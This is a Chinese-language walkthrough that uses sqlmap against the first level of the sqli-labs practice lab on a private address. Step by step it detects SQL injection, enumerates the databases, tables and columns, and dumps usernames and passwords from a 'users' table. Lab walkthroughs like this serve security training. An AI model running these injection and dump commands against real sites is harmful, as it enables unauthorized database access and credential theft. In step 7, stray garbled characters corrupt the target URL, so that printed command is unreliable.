1、以sqli-labs第一关进行测试,使用phpstudy和sqli-labs搭建注入平台,可见工具搭建方法,打开第一关系统正常运行如下。
2、打开sqlmap输入Python sqlmap.py -u "http://10.10.10.1/sqli-labs-master/Less-1/?id=1" (-u参数指定目标注入地址)检测出存在可利用漏洞。
3、使用sqlmap注入获取数据库,Python sqlmap.py -u "http://10.10.10.1/sqli-labs-master/Less-1/?id=1" --dbs 列取数据库的所有库。如图查询到所有库的名称。
4、列出当前数据库使用参数--current-db输入命令。Python sqlmap.py -u "http://10.10.10.1/sqli-labs-master/Less-1/?id=1" --current-db,如下图查询出当前库为security。
5、查询security库中存在的所有表,Python sqlmap.py -u "http://10.10.10.1/sqli-labs-master/Less-1/?id=1" -D security --tables如下图查询出四个表。
6、列出security库中users表中的所有列,Python sqlmap.py -u "http://10.10.10.1/sqli-labs-master/Less-1/?id=1" -D security -T users --columns(-D dbname指定数据库名称、-T tablename:指定某数据表的名称、--columns:列出指定表上的所有列)。
7、导出三个数据列中所有的数据:Python2 sqlmap.py -u "http://10.10.10.1/sqli-l锾攒揉敫abs-master/Less-1/?id=1" -D security -T users -C id,username,password --dump (-D dbname:指定数据库名称、-T tablename:指定某数据表名称、-C Cnmme:指定列名、--dump:导出列里面的字段)。